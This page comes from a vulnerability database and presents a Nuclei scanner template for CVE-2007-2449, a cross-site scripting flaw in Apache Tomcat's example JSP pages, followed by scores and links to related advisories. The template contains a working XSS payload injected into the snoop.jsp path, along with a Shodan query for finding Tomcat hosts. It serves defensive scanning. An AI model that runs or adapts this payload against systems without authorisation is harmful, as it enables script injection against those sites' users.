Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2007-2449
HistorySep 09, 2024 - 5:01 p.m.

Apache Tomcat 4.x-7.x - Cross-Site Scripting

2024-09-0917:01:10
ProjectDiscovery
github.com
13
apache tomcat
cross-site scripting
vulnerability
arbitrary script
browser
security

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

7.2

Confidence

High

EPSS

0.959

Percentile

99.5%

JSON
Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.

id: CVE-2007-2449

info:
  name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
  author: pdteam,ritikchaddha
  severity: medium
  description: |
    Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://vulners.com/securityvulns/SECURITYVULNS:DOC:17267
    - https://nvd.nist.gov/vuln/detail/CVE-2007-2449
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"Apache Tomcat"
  tags: cve,cve2007,apache,misconfig,tomcat,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp'
          - 'JSP Request Method'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220123f57dd5d304a126e38f830fcc9717c81aea7327eefd83ffab2ae79963adaee02200cc51456063ab496965fb4ca5e4714e6cd8274b212d6b07b9d1d79be74d36fd0:922c64590222798bb761d5b6d8e72950

Related

nessus 24
packetstorm 1
prion 1
osv 1
nvd 1
veracode 1
github 1
ubuntucve 1
cvelist 1
securityvulns 3
cve 1
jvn 1
exploitdb 1
openvas 28
redhat 5
oraclelinux 1
centos 1
tomcat 3
fedora 5
altlinux 1
ibm 1
nessus
nessus
Apache Tomcat snoop.jsp URI XSS
2007-06-18 00:00:00
SuSE9 Security Update : Tomcat (YOU Patch Number 12116)
2009-09-24 00:00:00
Oracle Linux 5 : tomcat (ELSA-2007-0569)
2013-07-12 00:00:00
packetstorm
packetstorm
CVE-2007-2449.txt
2007-06-15 00:00:00
prion
prion
Cross site scripting
2007-06-14 23:30:00
osv
osv
Apache Tomcat XSS Vulnerabilities in Examples Web Application
2022-05-01 18:03:36
nvd
nvd
CVE-2007-2449
2007-06-14 23:30:00
veracode
veracode
Cross-Site Scripting (XSS)
2020-04-10 00:19:32
github
github
Apache Tomcat XSS Vulnerabilities in Examples Web Application
2022-05-01 18:03:36
ubuntucve
ubuntucve
CVE-2007-2449
2007-06-14 00:00:00
cvelist
cvelist
CVE-2007-2449
2007-06-14 23:00:00
securityvulns
securityvulns
[Full-disclosure] [CVE-2007-2449] Apache Tomcat XSS vulnerabilities in the JSP examples
2007-06-14 00:00:00
Apache Tomcat crossite scripting
2007-06-14 00:00:00
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities &#40;Updated - v1.1&#41;
2009-01-28 00:00:00
cve
cve
CVE-2007-2449
2007-06-14 23:30:00
jvn
jvn
JVN#64851600 Apache Tomcat sample web application cross-site scripting vulnerability
2007-06-15 00:00:00
exploitdb
exploitdb
Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting
2007-06-14 00:00:00
openvas
openvas
SLES9: Security update for Tomcat
2009-10-10 00:00:00
SLES10: Security update for Tomcat 5
2009-10-13 00:00:00
SLES9: Security update for Tomcat
2009-10-10 00:00:00
redhat
redhat
(RHSA-2007:0569) Moderate: tomcat security update
2007-07-17 00:00:00
(RHSA-2007:0876) Moderate: tomcat security update
2007-10-11 00:00:00
(RHSA-2008:0630) Low: Red Hat Network Satellite Server security update
2008-08-13 00:00:00
oraclelinux
oraclelinux
Moderate: tomcat security update
2007-07-17 00:00:00
centos
centos
tomcat5 security update
2007-07-22 15:57:46
tomcat
tomcat
Fixed in Apache Tomcat 6.0.14
2007-08-13 00:00:00
Fixed in Apache Tomcat 5.5.25, 5.0.SVN
2007-09-08 00:00:00
Fixed in Apache Tomcat 4.1.37
2005-10-06 00:00:00
fedora
fedora
[SECURITY] Fedora 8 Update: tomcat5-5.5.25-1jpp.1.fc8
2007-11-17 05:37:36
[SECURITY] Fedora 7 Update: tomcat5-5.5.25-1jpp.1.fc7
2007-11-17 05:34:43
[SECURITY] Fedora 7 Update: tomcat5-5.5.26-1jpp.2.fc7
2008-02-13 04:55:03
altlinux
altlinux
Security fix for the ALT Linux 5 package tomcat5 version 0:5.5.25-alt1_1.1jpp5.0
2007-11-30 00:00:00
ibm
ibm
Security Bulletin: TADDM affected by multiple vulnerabilities due to Apache Tomcat libraries
2023-01-27 10:54:22

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

7.2

Confidence

High

EPSS

0.959

Percentile

99.5%

JSON
Related for NUCLEI:CVE-2007-2449
nessus24packetstorm1prion1osv1nvd1veracode1github1ubuntucve1cvelist1securityvulns3cve1jvn1exploitdb1openvas28redhat5oraclelinux1centos1tomcat3fedora5altlinux1ibm1